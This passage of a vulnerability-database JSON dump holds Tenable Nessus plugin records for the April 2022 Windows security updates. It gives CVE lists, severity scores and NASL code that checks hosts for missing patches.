\"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012626\");\n script_xref(name:\"MSKB\", value:\"5012649\");\n script_xref(name:\"MSFT\", value:\"MS22-5012626\");\n script_xref(name:\"MSFT\", value:\"MS22-5012649\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012649: Windows Server 2008 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012639. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5012649 or Cumulative Update KB5012626.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012649',\n '5012626'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012649, 5012626])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:02", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012670. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-24484, CVE-2022-24538, CVE-2022-26784, CVE-2022-26831, CVE-2022-26915)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012670: Windows Server 2012 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26784", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012639.NASL", "href": "https://www.tenable.com/plugins/nessus/159682", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159682);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24550\",\n \"CVE-2022-26784\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012639\");\n script_xref(name:\"MSKB\", value:\"5012670\");\n script_xref(name:\"MSFT\", value:\"MS22-5012639\");\n script_xref(name:\"MSFT\", value:\"MS22-5012670\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012670: Windows Server 2012 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012670. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-24484,\n CVE-2022-24538, CVE-2022-26784, CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012639 or Cumulative Update 5012670\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012670',\n '5012639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012670, 5012639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:43", "description": "The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831 CVE-2022-26915, CVE-2022-23268) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012592: Windows 11 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26826", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012592.NASL", "href": "https://www.tenable.com/plugins/nessus/159671", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159671);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-23268\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26826\",\n \"CVE-2022-26830\",\n \"CVE-2022-26831\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012592\");\n script_xref(name:\"MSFT\", value:\"MS22-5012592\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012592: Windows 11 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831\n CVE-2022-26915, CVE-2022-23268)\n \n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, \n CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, \n CVE-2022-24545, CVE-2022-24541, CVE-2022-24492,\n CVE-2022-24491, CVE-2022-24537, CVE-2022-24487,\n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533,\n CVE-2022-24495, CVE-2022-24528, CVE-2022-23257,\n CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, \n CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-24493, \n CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26789, \n CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, \n CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, \n CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, \n CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, \n CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, \n CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, \n CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012592\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012592\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright 